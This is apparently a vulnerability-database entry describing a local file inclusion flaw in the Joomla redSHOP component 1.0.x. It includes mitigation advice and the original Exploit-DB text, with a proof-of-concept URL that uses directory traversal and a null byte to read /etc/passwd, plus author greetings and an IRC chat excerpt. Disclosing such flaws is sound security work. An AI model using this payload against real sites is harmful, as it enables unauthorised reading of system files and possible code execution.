Joomla Component redSHOP Local File Inclusion Vulnerability

vendor:

com_redshop

by:

NoGe

7,5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: com_redshop

Affected Version From: 1.0.x

Affected Version To: 1.0.x

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Joomla Component redSHOP Local File Inclusion Vulnerability

A local file inclusion vulnerability exists in com_redshop version 1.0.x, which allows an attacker to include a file from the local system. This can be exploited to gain access to sensitive information or to execute arbitrary code. The vulnerability is due to insufficient sanitization of user-supplied input to the 'view' parameter in the 'index.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing directory traversal sequences and a URL-encoded NULL byte (%00) to the vulnerable script. This can result in the disclosure of sensitive information or the execution of arbitrary code.

Mitigation:

Input validation should be used to prevent directory traversal attacks. All user-supplied input should be validated and filtered for malicious characters.

Source

Exploit-DB raw data:

======================================================================================================================


  [o] Joomla Component redSHOP Local File Inclusion Vulnerability
 
       Software : com_redshop version 1.0.x [ commercial ]
       Vendor   : http://redcomponent.com/
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com/
       Home     : http://antisecurity.org/


======================================================================================================================


  [o] Exploit

       http://localhost/[path]/index.php?option=com_redshop&view=[LFI]


  [o] PoC

       http://localhost/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00


======================================================================================================================


  [o] Greetz

       Vrs-hCk OoN_BoY Paman zxvf Angela Zhang aJe martfella pizzyroot
       H312Y yooogy mousekill }^-^{ noname matthews s4va stardustmemory
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke


======================================================================================================================


  [o] Iklan Layanan Masyarakat

       -irc.******.net- *** Notice -- ander used SAJOIN to make wishnusakti join #channel
       <Jack> wew
       <Jack> ngapaen lu bedua di sini?
       <Jack> ck ck ck
       <@ander> kegiatan mafia
       <@wishnusakti> belajar broo ;))
       <@wishnusakti> nubi nih :(
       <Jack> sama dunk bro
       <Jack> aq ikut yak
       <Jack> mohon bimbingan na sesepuh
       <@wishnusakti> tuhh aku di ajarin ma ander-wear kok 
       <@wishnusakti> minta ma dia brooo 
       <Jack> ok bro
       <Jack> bro ander-wear.. ajarin dunk
       <@wishnusakti> jangan manggil gitu 
       <@wishnusakti> kamu di plorotin celananya nanti broo =))
       <Jack> jadi apa dong?
       <@wishnusakti> ander ku sayang :*
       <~zxvf> [06:27] * ~ander lagi dengerin [Akon - Right Now (Na Na Na)] © [nob0dy] <=- kayak nya lg senenQ dia
       <&pizzy> lagi kasmaran dia 
       <&NoGe> lg berbunga² tuh
       <zxvf> icic

       ouw ouw kamu ketauan... wkakwakwkakwkwakwak... :p


======================================================================================================================